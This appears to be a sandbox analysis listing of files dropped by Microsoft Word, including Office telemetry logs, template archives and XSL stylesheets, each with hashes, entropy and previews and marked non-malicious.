    SHA-256:B7B29D8BC27DF9FAD485B4E802BDA6C39C14DC4CF3A9FB9B577E44219A61D9E7
    SHA-512:6B47784EDD2E57F5774CEEE86747899CABBFF7AED2623F849872A47B8AF842F1EE4FEF8A7494D95C373F1D8D5C9F2E78E099F515252377BBB7E5DBD8A8E4AC2A
    Malicious:false
    Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(...e.n.g.i.n.e.e.r...e......................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...\...n.......................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):43596
    Entropy (8bit):3.6705361254320246
    Encrypted:false
    SSDEEP:768:6kDl9L3AFPz4qrkv8RkaOIvWRLjCOojE1iRUSlV8ivuCDSle3H0XJ44:pDlV3ABz4Ykv8RkaOIvIPCOojBV8CuCQ
    MD5:814BF7F93B5683057A1729EA1FAE060E
    SHA1:BE861A93A83D93F7D0076A62A3B891525F17BCFD
    SHA-256:AC3B70A9AD0902B84A32390D07C75C4113600164F60C556EA6E54238FF3C1DF6
    SHA-512:95A86E91C7808AC3DFB07FC104DEAAFF482C50F005BB9E651D3AC423B04D850592F4CC7C5D54F2B9C0DAC045C889DC6CFC7090AB8C4A8B7AEE5FA842A0BBAD8D
    Malicious:false
    Preview:..................................A.s. .a. .f.o.l.l.o.w.-.u.p. .t.o. .t.h.e. .C.r.o.w.d.S.t.r.i.k.e. .F.a.l.c.o.n. .a.g.e.n.t. .i.s.s.u.e. .i.m.p.a.c.t.i.n.g. .W.i.n.d.o.w.s. .c.l.i.e.n.t.s. .a.n.d. .s.e.r.v.e.r.s.,. .M.i.c.r.o.s.o.f.t. .h.a.s. .r.e.l.e.a.s.e.d. .a.n...u.p.d.a.t.e.d...r.e.c.o.v.e.r.y. .t.o.o.l. .w.i.t.h...t.w.o. .r.e.p.a.i.r. .o.p.t.i.o.n.s...t.o. .h.e.l.p. .I.T. .a.d.m.i.n.s. .e.x.p.e.d.i.t.e. .t.h.e. .r.e.p.a.i.r. .p.r.o.c.e.s.s... .T.h.e. .s.i.g.n.e.d. ................................................................................... ..."...........L......................................................................................................................................................................................................................................................................................................................................................................$..&..F...d......d...d.-D..M............[$.\$.a$.gdK.e.....$.-D..
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:ASCII text, with very long lines (10173), with CRLF line terminators
    Category:dropped
    Size (bytes):30125
    Entropy (8bit):5.477074988936344
    Encrypted:false
    SSDEEP:768:6CT+8jVZqN+uwTICQPwWoIIRgQazes1tDjjnnBFAmilMwtIffmz:6CT+8jVswuWICMwWoIIRgtes1tHrnBFq
    MD5:767677ABAE05CEE23150528539A949DB
    SHA1:5DEF58A91E987CC718FB51186F58CBE25EEA5E99
    SHA-256:0EB1169E0391AFBEA5244963F7ECB56B04BBE47CF090F1E561FD5508CEAFCBEA
    SHA-512:A22A4837D13628894020D596FFD1A6CA3A596C81990B7C6B61D120DACB58F1F387921D6F9F95C5642FA1CCC6A04FFF7B51A903BB55FFE05F719DBF68EEB6ABDC
    Malicious:false
    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..07/22/2024 13:57:40.364.WINWORD (0x86C).0xC24.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-07-22T13:57:40.364Z","Contract":"Office.System.Activity","Activity.CV":"GOns7eqi3EmkFERUd6TzfQ.7.1","Activity.Duration":1309,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...07/22/2024 13:57:40.364.WINWORD (0x86C).0xC24.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":24,"Time":"2024-07-22T13:57:40.364Z","Contract":"Office.System.Activity","Activity.CV":"GOns7eqi3EmkFERUd6TzfQ.7","Activity.Duration":3803,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureDiag
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:ASCII text, with very long lines (28929), with CRLF line terminators
    Category:dropped
    Size (bytes):20971520
    Entropy (8bit):0.19469915830844212
    Encrypted:false
    SSDEEP:1536:8oMF0cgFWeIuTT5jpzo+cBwBuJG9/juQ6hzqBJJsjrDvWl0UOp+cqe29zjWnvj+d:Bc7eIU3o++w6Cfjl
    MD5:651F2829FBA04A38F048069D9C6A2F71
    SHA1:732800B964AAC1EC0362C60B934CD1F0826C1659
    SHA-256:11C95D2AB3FBD174034CF0229C2A325D3FA103E045A587695AD16E02F5FEB5A2
    SHA-512:1CA98CE46300DA7ED9A3566F0ED03976F234C8BCBFA4683236061A39A3BD5AC2492455B7409C462156EF573B2F5B2C2E16952206C74C1EA7D07A52A17A6D1E8A
    Malicious:false
    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..07/22/2024 13:58:33.768.WINWORD (0xF10).0x19F8.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":24,"Time":"2024-07-22T13:58:33.768Z","Contract":"Office.System.Activity","Activity.CV":"spLUd5J+P0GyM7B2cBEPMg.1.14","Activity.Duration":17,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...07/22/2024 13:58:33.768.WINWORD (0xF10).0x19F8.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":26,"Time":"2024-07-22T13:58:33.768Z","Contract":"Office.System.Activity","Activity.CV":"spLUd5J+P0GyM7B2cBEPMg.1.15","Activity.Duration":8845,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVersion":
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):20971520
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
    SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
    SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
    SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):558035
    Entropy (8bit):7.696653383430889
    Encrypted:false
    SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
    MD5:3B5E44DDC6AE612E0346C58C2A5390E3
    SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
    SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
    SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
    Malicious:false
    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):276
    Entropy (8bit):3.5361139545278144
    Encrypted:false
    SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
    MD5:133D126F0DE2CC4B29ECE38194983265
    SHA1:D8D701298D7949BE6235493925026ED405290D43
    SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
    SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
    Malicious:false
    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):570901
    Entropy (8bit):7.674434888248144
    Encrypted:false
    SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
    MD5:D676DE8877ACEB43EF0ED570A2B30F0E
    SHA1:6C8922697105CEC7894966C9C5553BEB64744717
    SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
    SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
    Malicious:false
    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):282
    Entropy (8bit):3.5459495297497368
    Encrypted:false
    SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
    MD5:76340C3F8A0BFCEDAB48B08C57D9B559
    SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
    SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
    SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
    Malicious:false
    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft OOXML
    Category:dropped
    Size (bytes):4026
    Entropy (8bit):7.809492693601857
    Encrypted:false
    SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
    MD5:5D9BAD7ADB88CEE98C5203883261ACA1
    SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
    SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
    SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
    Malicious:false
    Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):250
    Entropy (8bit):3.4916022431157345
    Encrypted:false
    SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
    MD5:1A314B08BB9194A41E3794EF54017811
    SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
    SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
    SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):16806
    Entropy (8bit):7.9519793977093505
    Encrypted:false
    SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
    MD5:950F3AB11CB67CC651082FEBE523AF63
    SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
    SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
    SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
    Malicious:false
    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):254
    Entropy (8bit):3.4720677950594836
    Encrypted:false
    SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
    MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
    SHA1:668FF6DFE64D5306220341FC2C1353199D122932
    SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
    SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):280
    Entropy (8bit):3.484503080761839
    Encrypted:false
    SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
    MD5:1309D172F10DD53911779C89A06BBF65
    SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
    SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
    SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
    Category:dropped
    Size (bytes):9191
    Entropy (8bit):7.93263830735235
    Encrypted:false
    SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
    MD5:08D3A25DD65E5E0D36ADC602AE68C77D
    SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
    SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
    SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
    Malicious:false
    Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):333258
    Entropy (8bit):4.654450340871081
    Encrypted:false
    SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
    MD5:5632C4A81D2193986ACD29EADF1A2177
    SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
    SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
    SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):328
    Entropy (8bit):3.541819892045459
    Encrypted:false
    SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
    MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
    SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
    SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
    SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):290
    Entropy (8bit):3.5081874837369886
    Encrypted:false
    SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
    MD5:8D9B02CC69FA40564E6C781A9CC9E626
    SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
    SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
    SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
    Malicious:false
    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):255948
    Entropy (8bit):5.103631650117028
    Encrypted:false
    SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
    MD5:9888A214D362470A6189DEFF775BE139
    SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
    SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
    SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
    Malicious:false
    Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
